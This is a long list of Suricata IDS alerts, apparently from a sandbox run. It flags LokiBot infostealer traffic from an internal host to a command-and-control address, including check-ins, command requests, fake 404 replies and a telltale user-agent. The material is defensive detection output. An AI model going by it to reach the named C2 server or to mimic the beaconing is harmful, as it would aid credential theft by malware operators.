Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49865 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49978 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:50030 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49978 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.95:80 -> 192.168.2.4:49888
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49991 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49923 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:50084 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:50084 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49985 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49985 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49761 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49741 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49795 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.95:80 -> 192.168.2.4:50054
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49741 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.95:80 -> 192.168.2.4:49875
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.95:80 -> 192.168.2.4:49754
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49865 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49991 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49869 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49869 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49991 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:50010 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49785 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.95:80 -> 192.168.2.4:49918
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49785 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.95:80 -> 192.168.2.4:49855
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.95:80 -> 192.168.2.4:49895
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:50030 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49965 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.95:80 -> 192.168.2.4:49785
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49965 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49865 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.95:80 -> 192.168.2.4:50084
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49985 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.95:80 -> 192.168.2.4:49923
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:50021 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:50021 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:50021 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:50010 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.95:80 -> 192.168.2.4:49808
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:50030 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:50030 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49741 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49991 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49761 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.95:80 -> 192.168.2.4:50010
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49761 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49884 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49884 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:50021 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.95:80 -> 192.168.2.4:49865
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49991 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.95:80 -> 192.168.2.4:49741
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.95:80 -> 192.168.2.4:49869
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49884 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:50063 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:50063 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49956 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.95:80 -> 192.168.2.4:49978
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:50021 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:50073 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.95:80 -> 192.168.2.4:49965
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.95:80 -> 192.168.2.4:49795
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49956 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49884 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:50073 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49956 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:50073 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.95:80 -> 192.168.2.4:49991
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49985 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:50073 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:50073 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.95:80 -> 192.168.2.4:49761
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.95:80 -> 192.168.2.4:50021
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:50026 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:50026 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.95:80 -> 192.168.2.4:49985
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.95:80 -> 192.168.2.4:50030
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:50003 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49911 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49884 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:50026 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:50063 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:50003 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:50026 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:50063 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:50044 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:50026 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49911 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:50044 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:50003 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.95:80 -> 192.168.2.4:50073
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:50063 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:50044 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49998 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.95:80 -> 192.168.2.4:49884
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:50003 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49841 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:50003 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49911 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49998 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.95:80 -> 192.168.2.4:50026
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49956 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49841 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49956 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49998 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49911 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49911 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49942 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:50044 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.95:80 -> 192.168.2.4:49911
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:50044 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49813 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49841 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49942 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49998 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.95:80 -> 192.168.2.4:50063
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49745 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49745 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.95:80 -> 192.168.2.4:50003
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49813 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49942 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49813 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49998 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49841 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49900 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.95:80 -> 192.168.2.4:50044
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49900 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49745 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49841 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49900 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.95:80 -> 192.168.2.4:49998
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.95:80 -> 192.168.2.4:49956
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49900 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49900 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49745 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49745 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.95:80 -> 192.168.2.4:49841
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49942 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49942 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49813 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.95:80 -> 192.168.2.4:49745
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.95:80 -> 192.168.2.4:49942
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49813 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.95:80 -> 192.168.2.4:49900
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49752 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49752 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49752 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.95:80 -> 192.168.2.4:49813
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49752 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49949 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49752 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49949 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49949 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.95:80 -> 192.168.2.4:49752
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49949 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49949 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.95:80 -> 192.168.2.4:49949
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:50039 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:50039 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:50039 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:50080 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:50080 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:50080 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:50039 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:50039 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:50080 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:50080 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.95:80 -> 192.168.2.4:50080
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49932 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.95:80 -> 192.168.2.4:50039
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49932 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49932 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49932 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49932 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:50049 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:50049 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.95:80 -> 192.168.2.4:49932
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:50049 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:50049 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:50049 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.95:80 -> 192.168.2.4:50049
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:50068 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:50068 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:50068 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:50068 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:50068 -> 94.156.177.95:80
